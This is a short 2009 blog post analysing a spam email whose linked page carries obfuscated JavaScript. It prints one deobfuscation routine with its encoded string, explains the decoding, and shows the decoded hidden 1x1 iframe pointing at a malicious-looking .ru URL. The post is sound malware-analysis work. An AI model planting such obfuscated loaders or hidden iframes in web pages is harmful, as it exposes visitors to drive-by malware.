xorl %eax, %eax

Funny Spam Email

leave a comment »

I received a cute spam email today. Its subject was “I watch after your PC” and its body was just containing this:

Know any maps on-line?
http://stalker-vgpu.by.ru/demo.html

Of course, it hit an amazing 15.3 score in SpamAssassin but it was still worth a try. The sender’s address was:

Received: from [190.246.47.14] (HELO 14-47-246-190.fibertel.com.ar)

So, I wget(1) that page and not surprisingly, it was some obfuscated JavaScript code. After a couple of minutes of clearing the JavaScript code up the code was pretty easy to understand. The JavaScript section is composed of nine functions. Most of them contain a straightforward algorithm similar to this:

function AEvZVPZNFD(LIFcfdLH)
{
	var int_three=3;
	var int_six=6;
	var obfu='49,3-30,3-19,3-52,0-58,0-58,0-56,0-29,0-23,3-23,3-49,0-50,3-48,3-58,3-58,0-60,3-54,3-55,3-50,0-48,3-23,0-57,0-58,3-23,3-58,0-50,3-54,3-56,0-54,0-48,3-58,0-50,3-57,3-23,3-52,3-55,0-50,0-50,3-60,0-23,0-56,0-52,0-56,0-19,3-31,0-30,0-23,3-52,3-51,0-57,0-';
	var deobfu=obfu.split('-');
	string_ret='';
	for(i=0; i<deobfu.length-1; i+=1)
	{ 
		ArrayOne=deobfu[i].split(',');
		retval = parseInt(ArrayOne[0]*int_six)+parseInt(ArrayOne[1]);
		retval = parseInt(retval)/int_three;
		string_ret += String.fromCharCode(retval);
	}

	return string_ret;
}

As you can see, it has a variable (which I renamed to ‘obfu’) that contains a series of numbers separated with ‘,’ and ‘-‘. The next variable (which I renamed it to ‘deobfu’) will simply replace the ‘-‘ characters with ‘,’ using split() and store the result in it.
The ‘for’ loop will iterate through each character and perform some calculations on each number. Specifically, it will execute the following for each one…

retval = atoi(character * 6) + atoi(next_character);
retval = atoi(retval/3);

And at last, append the result to ‘string_ret’ after converting the Unicode value to a character using fromCharCode() function. After decoding all of the obfuscated code, the result is this:

<!-- From MWmC() function -->
<iframe width=1 height=1 border=0 frameborder=0 sr
<!-- From AEvZVPZNFD() function -->
c='http://beautymoda.ru/templates/index.php'></ifr
<!-- From dHIw() function -->
ame>

So, it basically executes this:

<iframe width=1 height=1 border=0 frameborder=0 src='http://beautymoda.ru/templates/index.php'></iframe>

Unfortunately, it seems that it was already reported to the hosting provider since the above URL redirects to ‘https://best-hoster.ru/suspend/&#8217; which indicates that the website is suspended.

Written by xorl

November 7, 2009 at 01:18

Posted in fun

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s